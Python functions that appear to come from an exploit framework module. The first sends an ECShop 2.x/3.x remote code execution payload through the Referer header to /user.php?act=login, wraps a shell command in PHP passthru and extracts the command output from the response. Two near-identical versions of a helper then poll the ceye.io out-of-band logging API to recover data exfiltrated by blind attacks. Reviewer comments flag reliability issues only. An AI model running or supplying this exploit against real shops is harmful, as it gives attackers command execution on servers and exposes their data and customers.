def _exploit(self, cmd='whoami'):
    """
    Send the generated payload to /user.php?act=login and return the text
    the response echoes back in the hidden ``back_act`` input.

    :param cmd: command wrapped in a PHP ``passthru`` call; default ``whoami``
    :return: the extracted text of the first response that yields one, or
             ``None`` (implicit) when no payload produced a usable response
    """
    url = urljoin(self.url, '/user.php?act=login')
    phpcode = 'passthru("{0}");'.format(cmd)
    # ECShop 2.x payload
    ec2payload = self.gen_ec2payload(phpcode)
    # ECShop 3.x payload
    ec3payload = self.gen_ec3payload(phpcode)
    option = self.get_option("version")
    # NOTE(review): `payloads` is only bound for "Auto", "2.x" and "3.x";
    # any other option value raises UnboundLocalError at the loop below.
    if option == "Auto":
        payloads = [(ec2payload, '2.x'), (ec3payload, '3.x')]
    elif option == "2.x":
        payloads = [(ec2payload, '2.x')]
    elif option == '3.x':
        payloads = [(ec3payload, '3.x')]
    for payload in payloads:
        # payload[0] is the generated string; payload[1] (the version tag)
        # is never read.
        headers = {'Referer': payload[0]}
        # NOTE(review): no timeout is set, so an unresponsive host blocks
        # this call indefinitely.
        resp = requests.get(url, headers=headers)
        # First try the delimiter ending at the line break / <br />, then
        # the fallback 'xxx' suffix.
        r = get_middle_text(
            resp.text, '''<input type="hidden" name="back_act" value="''', "\n<br />")
        if r:
            return r
        r = get_middle_text(
            resp.text, '''<input type="hidden" name="back_act" value="''', 'xxx')
        if r:
            return r
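def exact_request(self, flag, type="request"):
    """
    Obtain relevant data by accessing the ceye interface.

    Polls the ceye.io records API for entries whose text contains ``flag``
    and returns what ``get_middle_text`` extracts from the first record
    name that yields something.

    :param flag: Input flag to filter the records by
    :param type: Request type (dns|request), the default is request
    :return: The extracted data, or ``False`` when no usable record was
             obtained within the retry budget
    """
    attempts = 3
    # NOTE(review): the API token travels as a query parameter over plain
    # HTTP as the URL is written here; confirm whether https is available.
    # `flag` and `type` are interpolated unquoted, which is fine for the
    # alphanumeric values this expects — confirm against the callers.
    url = (
        "http://api.ceye.io/v1/records?token={token}&type={type}&filter={flag}"
    ).format(token=self.token, type=type, flag=flag)
    while attempts:
        # Decrement on every pass so the loop is bounded even when the
        # server keeps answering without an exception.
        attempts -= 1
        try:
            time.sleep(1)
            # Without a timeout an unresponsive endpoint blocks forever.
            resp = requests.get(url, timeout=10)
            if resp.status_code == 200 and flag in resp.text:
                for item in json.loads(resp.text)["data"]:
                    found = get_middle_text(item.get("name", ''), flag, flag, 0)
                    if found:
                        return found
                # A well-formed answer with no usable record will not
                # improve by retrying immediately.
                break
        except Exception as ex:
            # Best-effort polling: log and retry on any failure.
            logger.warn(ex)
            time.sleep(1)
    return False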
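def exact_request(self, flag, type="request"):
    """
    Obtain relevant data by accessing the ceye interface.

    Polls the ceye.io records API for entries whose text contains ``flag``
    and returns what ``get_middle_text`` extracts from the first record
    name that yields something.

    :param flag: Input flag to filter the records by
    :param type: Request type (dns|request), the default is request
    :return: ``""`` when the account check fails, the extracted data on
             success, or ``False`` when no usable record was obtained
             within the retry budget
    """
    if not self.check_account():
        return ""
    attempts = 3
    # NOTE(review): the API token travels as a query parameter over plain
    # HTTP as the URL is written here; confirm whether https is available.
    url = "http://api.ceye.io/v1/records?token={token}&type={type}&filter={flag}".format(
        token=self.token, type=type, flag=flag)
    # Record names are cut out between "/<flag>" and the next "<flag>";
    # the start offset of 7 + len(flag) presumably skips a fixed-width
    # prefix before the payload — confirm against get_middle_text.
    prefix = "/" + flag
    suffix = flag
    offset = 7 + len(flag)
    while attempts:
        # Decrement on every pass so the loop is bounded even when the
        # server keeps answering without an exception.
        attempts -= 1
        try:
            time.sleep(1)
            # Without a timeout an unresponsive endpoint blocks forever.
            resp = requests.get(url, timeout=10)
            if resp.status_code == 200 and flag in resp.text:
                for item in json.loads(resp.text)["data"]:
                    found = get_middle_text(item.get("name", ''), prefix, suffix, offset)
                    if found:
                        return found
                # A well-formed answer with no usable record will not
                # improve by retrying immediately.
                break
        except Exception as ex:
            # Best-effort polling: log and retry on any failure.
            logger.warn(ex)
            time.sleep(1)
    return False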